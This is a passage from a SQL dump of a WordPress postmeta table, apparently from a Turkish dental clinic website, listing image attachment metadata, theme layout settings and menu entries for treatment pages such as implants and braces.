0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3841, 6355, '_wp_attached_file', '2018/07/Sabit-Protez-Tedavisi.jpg'),
(3842, 6355, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:375;s:6:\"height\";i:294;s:4:\"file\";s:33:\"2018/07/Sabit-Protez-Tedavisi.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Sabit-Protez-Tedavisi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Sabit-Protez-Tedavisi-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:33:\"Sabit-Protez-Tedavisi-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3843, 6356, '_wp_attached_file', '2018/07/protez-tedavi.jpg'),
(3844, 6356, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2018/07/protez-tedavi.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"protez-tedavi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"protez-tedavi-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:25:\"protez-tedavi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:25:\"protez-tedavi-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:25:\"protez-tedavi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3845, 6353, '_thumbnail_id', '6356'),
(3846, 6353, 'slide_template', 'default'),
(3847, 6353, '_wpb_vc_js_status', 'true'),
(3848, 6353, 'us_header', ''),
(3849, 6353, 'us_header_id', ''),
(3850, 6353, 'us_header_sticky_override', '0'),
(3851, 6353, 'us_header_transparent_override', '0'),
(3852, 6353, 'us_header_shadow', '0'),
(3853, 6353, 'us_header_sticky_pos', ''),
(3854, 6353, 'us_titlebar', ''),
(3855, 6353, 'us_titlebar_subtitle', ''),
(3856, 6353, 'us_titlebar_size', ''),
(3857, 6353, 'us_titlebar_color', ''),
(3858, 6353, 'us_titlebar_breadcrumbs', ''),
(3859, 6353, 'us_titlebar_image', ''),
(3860, 6353, 'us_titlebar_bg_size', ''),
(3861, 6353, 'us_titlebar_bg_repeat', ''),
(3862, 6353, 'us_titlebar_bg_position', ''),
(3863, 6353, 'us_titlebar_bg_parallax', ''),
(3864, 6353, 'us_titlebar_overlay_color', ''),
(3865, 6353, 'us_sidebar', ''),
(3866, 6353, 'us_sidebar_id', 'default_sidebar'),
(3867, 6353, 'us_sidebar_pos', 'right'),
(3868, 6353, 'us_footer', ''),
(3869, 6353, 'us_footer_id', 'site-footer'),
(3870, 6353, 'us_tile_bg_color', ''),
(3871, 6353, 'us_tile_text_color', ''),
(3872, 6353, 'us_tile_size', '1x1'),
(3873, 6353, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3874, 6353, 'us_tile_additional_image', ''),
(3875, 6358, 'us_og_image', ''),
(3876, 6358, 'us_grid_layout_ids', ''),
(3877, 6358, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3878, 6358, '_menu_item_type', 'post_type'),
(3879, 6358, '_menu_item_menu_item_parent', '6156'),
(3880, 6358, '_menu_item_object_id', '6353'),
(3881, 6358, '_menu_item_object', 'us_portfolio'),
(3882, 6358, '_menu_item_target', ''),
(3883, 6358, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3884, 6358, '_menu_item_xfn', ''),
(3885, 6358, '_menu_item_url', ''),
(3892, 6362, '_wp_attached_file', '2018/07/dis-teli.jpg'),
(3893, 6362, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:20:\"2018/07/dis-teli.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"dis-teli-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"dis-teli-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:20:\"dis-teli-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:20:\"dis-teli-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:20:\"dis-teli-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3926, 6365, '_wp_attached_file', '2018/07/pedodonti.jpg'),
(3927, 6365, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2018/07/pedodonti.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"pedodonti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"pedodonti-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:21:\"pedodonti-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:21:\"pedodonti-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:21:\"pedodonti-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3955, 6367, 'us_og_image', ''),
(3956, 6367, 'us_grid_layout_ids', ''),
(3957, 6367, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3958, 6367, '_edit_last', '1'),
(3959, 6367, '_thumbnail_id', '6362'),
(3960, 6367, 'slide_template', 'default'),
(3961, 6367, '_wpb_vc_js_status', 'false'),
(3962, 6367, 'us_header', ''),
(3963, 6367, 'us_header_id', ''),
(3964, 6367, 'us_header_sticky_override', '0'),
(3965, 6367, 'us_header_transparent_override', '0'),
(3966, 6367, 'us_header_shadow', '0'),
(3967, 6367, 'us_header_sticky_pos', ''),
(3968, 6367, 'us_titlebar', ''),
(3969, 6367, 'us_titlebar_subtitle', ''),
(3970, 6367, 'us_titlebar_size', ''),
(3971, 6367, 'us_titlebar_color', ''),
(3972, 6367, 'us_titlebar_breadcrumbs', ''),
(3973, 6367, 'us_titlebar_image', ''),
(3974, 6367, 'us_titlebar_bg_size', ''),
(3975, 6367, 'us_titlebar_bg_repeat', ''),
(3976, 6367, 'us_titlebar_bg_position', '');
INSERT INTO `zdenl_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(3977, 6367, 'us_titlebar_bg_parallax', ''),
(3978, 6367, 'us_titlebar_overlay_color', ''),
(3979, 6367, 'us_sidebar', ''),
(3980, 6367, 'us_sidebar_id', 'default_sidebar'),
(3981, 6367, 'us_sidebar_pos', 'right'),
(3982, 6367, 'us_footer', ''),
(3983, 6367, 'us_footer_id', 'default-footer'),
(3984, 6367, 'us_tile_bg_color', ''),
(3985, 6367, 'us_tile_text_color', ''),
(3986, 6367, 'us_tile_size', '1x1'),
(3987, 6367, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3988, 6367, 'us_tile_additional_image', ''),
(3989, 6367, '_edit_lock', '1531735754:1'),
(3990, 6369, 'us_og_image', ''),
(3991, 6369, 'us_grid_layout_ids', ''),
(3992, 6369, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3993, 6369, '_edit_last', '1'),
(3994, 6369, '_thumbnail_id', '6365'),
(3995, 6369, 'slide_template', 'default'),
(3996, 6369, '_wpb_vc_js_status', 'false'),
(3997, 6369, 'us_header', ''),
(3998, 6369, 'us_header_id', ''),
(3999, 6369, 'us_header_sticky_override', '0'),
(4000, 6369, 'us_header_transparent_override', '0'),
(4001, 6369, 'us_header_shadow', '0'),
(4002, 6369, 'us_header_sticky_pos', ''),
(4003, 6369, 'us_titlebar', ''),
(4004, 6369, 'us_titlebar_subtitle', ''),
(4005, 6369, 'us_titlebar_size', ''),
(4006, 6369, 'us_titlebar_color', ''),
(4007, 6369, 'us_titlebar_breadcrumbs', ''),
(4008, 6369, 'us_titlebar_image', ''),
(4009, 6369, 'us_titlebar_bg_size', ''),
(4010, 6369, 'us_titlebar_bg_repeat', ''),
(4011, 6369, 'us_titlebar_bg_position', ''),
(4012, 6369, 'us_titlebar_bg_parallax', ''),
(4013, 6369, 'us_titlebar_overlay_color', ''),
(4014, 6369, 'us_sidebar', ''),
(4015, 6369, 'us_sidebar_id', 'default_sidebar'),
(4016, 6369, 'us_sidebar_pos', 'right'),
(4017, 6369, 'us_footer', ''),
(4018, 6369, 'us_footer_id', 'default-footer'),
(4019, 6369, 'us_tile_bg_color', ''),
(4020, 6369, 'us_tile_text_color', ''),
(4021, 6369, 'us_tile_size', '1x1'),
(4022, 6369, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4023, 6369, 'us_tile_additional_image', ''),
(4024, 6369, '_edit_lock', '1531736064:1'),
(4031, 6371, 'us_og_image', ''),
(4032, 6371, 'us_grid_layout_ids', ''),
(4033, 6371, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4034, 6371, '_menu_item_type', 'post_type'),
(4035, 6371, '_menu_item_menu_item_parent', '6156'),
(4036, 6371, '_menu_item_object_id', '6369'),
(4037, 6371, '_menu_item_object', 'us_portfolio'),
(4038, 6371, '_menu_item_target', ''),
(4039, 6371, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4040, 6371, '_menu_item_xfn', ''),
(4041, 6371, '_menu_item_url', ''),
(4043, 6372, 'us_og_image', ''),
(4044, 6372, 'us_grid_layout_ids', ''),
(4045, 6372, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4046, 6372, '_menu_item_type', 'post_type'),
(4047, 6372, '_menu_item_menu_item_parent', '6156'),
(4048, 6372, '_menu_item_object_id', '6367'),
(4049, 6372, '_menu_item_object', 'us_portfolio'),
(4050, 6372, '_menu_item_target', ''),
(4051, 6372, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4052, 6372, '_menu_item_xfn', ''),
(4053, 6372, '_menu_item_url', ''),
(4055, 6373, 'us_og_image', ''),
(4056, 6373, 'us_grid_layout_ids', ''),
(4057, 6373, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4058, 6373, '_edit_last', '1'),
(4059, 6373, '_edit_lock', '1531736880:1'),
(4060, 6374, '_wp_attached_file', '2018/07/kemik-ogmentasyon.jpg'),
(4061, 6374, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/07/kemik-ogmentasyon.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"kemik-ogmentasyon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"kemik-ogmentasyon-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:29:\"kemik-ogmentasyon-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:29:\"kemik-ogmentasyon-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:29:\"kemik-ogmentasyon-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4062, 6373, '_thumbnail_id', '6374'),
(4063, 6373, 'slide_template', 'default'),
(4064, 6373, '_wpb_vc_js_status', 'true'),
(4065, 6373, 'us_header', ''),
(4066, 6373, 'us_header_id', ''),
(4067, 6373, 'us_header_sticky_override', '0'),
(4068, 6373, 'us_header_transparent_override', '0'),
(4069, 6373, 'us_header_shadow', '0'),
(4070, 6373, 'us_header_sticky_pos', ''),
(4071, 6373, 'us_titlebar', ''),
(4072, 6373, 'us_titlebar_subtitle', ''),
(4073, 6373, 'us_titlebar_size', ''),
(4074, 6373, 'us_titlebar_color', ''),
(4075, 6373, 'us_titlebar_breadcrumbs', ''),
(4076, 6373, 'us_titlebar_image', ''),
(4077, 6373, 'us_titlebar_bg_size', ''),
(4078, 6373, 'us_titlebar_bg_repeat', ''),
(4079, 6373, 'us_titlebar_bg_position', ''),
(4080, 6373, 'us_titlebar_bg_parallax', ''),
(4081, 6373, 'us_titlebar_overlay_color', ''),
(4082, 6373, 'us_sidebar', ''),
(4083, 6373, 'us_sidebar_id', 'default_sidebar'),
(4084, 6373, 'us_sidebar_pos', 'right'),
(4085, 6373, 'us_footer', ''),
(4086, 6373, 'us_footer_id', 'default-footer'),
(4087, 6373, 'us_tile_bg_color', ''),
(4088, 6373, 'us_tile_text_color', ''),
(4089, 6373, 'us_tile_size', '1x1'),
(4090, 6373, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4091, 6373, 'us_tile_additional_image', ''),
(4092, 6376, 'us_og_image', ''),
(4093, 6376, 'us_grid_layout_ids', ''),
(4094, 6376, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4095, 6376, '_edit_last', '1'),
(4096, 6376, '_edit_lock', '1531737100:1'),
(4097, 6377, '_wp_attached_file', '2018/07/sinus-lifting.jpg'),
(4098, 6377, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2018/07/sinus-lifting.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"sinus-lifting-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"sinus-lifting-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:25:\"sinus-lifting-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:25:\"sinus-lifting-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:25:\"sinus-lifting-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4099, 6376, '_thumbnail_id', '6377'),
(4100, 6376, 'slide_template', 'default'),
(4101, 6376, '_wpb_vc_js_status', 'true'),
(4102, 6376, 'us_header', ''),
(4103, 6376, 'us_header_id', ''),
(4104, 6376, 'us_header_sticky_override', '0'),
(4105, 6376, 'us_header_transparent_override', '0'),
(4106, 6376, 'us_header_shadow', '0'),
(4107, 6376, 'us_header_sticky_pos', ''),
(4108, 6376, 'us_titlebar', ''),
(4109, 6376, 'us_titlebar_subtitle', ''),
(4110, 6376, 'us_titlebar_size', ''),
(4111, 6376, 'us_titlebar_color', ''),
(4112, 6376, 'us_titlebar_breadcrumbs', ''),
(4113, 6376, 'us_titlebar_image', ''),
(4114, 6376, 'us_titlebar_bg_size', ''),
(4115, 6376, 'us_titlebar_bg_repeat', ''),
(4116, 6376, 'us_titlebar_bg_position', ''),
(4117, 6376, 'us_titlebar_bg_parallax', ''),
(4118, 6376, 'us_titlebar_overlay_color', ''),
(4119, 6376, 'us_sidebar', ''),
(4120, 6376, 'us_sidebar_id', 'default_sidebar'),
(4121, 6376, 'us_sidebar_pos', 'right'),
(4122, 6376, 'us_footer', ''),
(4123, 6376, 'us_footer_id', 'default-footer'),
(4124, 6376, 'us_tile_bg_color', ''),
(4125, 6376, 'us_tile_text_color', ''),
(4126, 6376, 'us_tile_size', '1x1'),
(4127, 6376, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4128, 6376, 'us_tile_additional_image', ''),
(4129, 6379, 'us_og_image', ''),
(4130, 6379, 'us_grid_layout_ids', ''),
(4131, 6379, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4132, 6379, '_edit_last', '1'),
(4133, 6379, '_edit_lock', '1531745006:1'),
(4134, 6380, '_wp_attached_file', '2018/07/implant2.jpeg'),
(4135, 6380, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:615;s:6:\"height\";i:412;s:4:\"file\";s:21:\"2018/07/implant2.jpeg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"implant2-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"implant2-300x201.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:21:\"implant2-350x350.jpeg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:21:\"implant2-600x412.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:21:\"implant2-600x402.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:21:\"implant2-600x400.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4136, 6381, '_wp_attached_file', '2018/07/implant5.jpeg'),
(4137, 6381, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:315;s:6:\"height\";i:209;s:4:\"file\";s:21:\"2018/07/implant5.jpeg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"implant5-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"implant5-300x199.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4138, 6379, 'slide_template', 'default'),
(4139, 6379, '_wpb_vc_js_status', 'true'),
(4140, 6379, 'us_header', ''),
(4141, 6379, 'us_header_id', ''),
(4142, 6379, 'us_header_sticky_override', '0'),
(4143, 6379, 'us_header_transparent_override', '0'),
(4144, 6379, 'us_header_shadow', '0'),
(4145, 6379, 'us_header_sticky_pos', ''),
(4146, 6379, 'us_titlebar', ''),
(4147, 6379, 'us_titlebar_subtitle', ''),
(4148, 6379, 'us_titlebar_size', ''),
(4149, 6379, 'us_titlebar_color', ''),
(4150, 6379, 'us_titlebar_breadcrumbs', ''),
(4151, 6379, 'us_titlebar_image', ''),
(4152, 6379, 'us_titlebar_bg_size', ''),
(4153, 6379, 'us_titlebar_bg_repeat', ''),
(4154, 6379, 'us_titlebar_bg_position', ''),
(4155, 6379, 'us_titlebar_bg_parallax', ''),
(4156, 6379, 'us_titlebar_overlay_color', ''),
(4157, 6379, 'us_sidebar', ''),
(4158, 6379, 'us_sidebar_id', 'default_sidebar'),
(4159, 6379, 'us_sidebar_pos', 'right'),
(4160, 6379, 'us_footer', ''),
(4161, 6379, 'us_footer_id', 'default-footer'),
(4162, 6379, 'us_tile_bg_color', ''),
(4163, 6379, 'us_tile_text_color', ''),
(4164, 6379, 'us_tile_size', '1x1'),
(4165, 6379, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4166, 6379, 'us_tile_additional_image', ''),
(4167, 6383, 'us_og_image', ''),
(4168, 6383, 'us_grid_layout_ids', ''),
(4169, 6383, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4170, 6383, '_edit_last', '1'),
(4171, 6383, '_edit_lock', '1531738318:1'),
(4172, 6384, '_wp_attached_file', '2018/07/implant-1.jpg'),
(4173, 6384, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2018/07/implant-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"implant-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"implant-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:21:\"implant-1-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:21:\"implant-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:21:\"implant-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4174, 6383, '_thumbnail_id', '6384'),
(4175, 6383, 'slide_template', 'default'),
(4176, 6383, '_wpb_vc_js_status', 'true'),
(4177, 6383, 'us_header', ''),
(4178, 6383, 'us_header_id', ''),
(4179, 6383, 'us_header_sticky_override', '0'),
(4180, 6383, 'us_header_transparent_override', '0'),
(4181, 6383, 'us_header_shadow', '0'),
(4182, 6383, 'us_header_sticky_pos', ''),
(4183, 6383, 'us_titlebar', ''),
(4184, 6383, 'us_titlebar_subtitle', ''),
(4185, 6383, 'us_titlebar_size', ''),
(4186, 6383, 'us_titlebar_color', ''),
(4187, 6383, 'us_titlebar_breadcrumbs', ''),
(4188, 6383, 'us_titlebar_image', ''),
(4189, 6383, 'us_titlebar_bg_size', ''),
(4190, 6383, 'us_titlebar_bg_repeat', ''),
(4191, 6383, 'us_titlebar_bg_position', ''),
(4192, 6383, 'us_titlebar_bg_parallax', ''),
(4193, 6383, 'us_titlebar_overlay_color', ''),
(4194, 6383, 'us_sidebar', ''),
(4195, 6383, 'us_sidebar_id', 'default_sidebar'),
(4196, 6383, 'us_sidebar_pos', 'right'),
(4197, 6383, 'us_footer', ''),
(4198, 6383, 'us_footer_id', 'default-footer'),
(4199, 6383, 'us_tile_bg_color', ''),
(4200, 6383, 'us_tile_text_color', ''),
(4201, 6383, 'us_tile_size', '1x1'),
(4202, 6383, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(4203, 6383, 'us_tile_additional_image', ''),
(4204, 6386, 'us_og_image', ''),
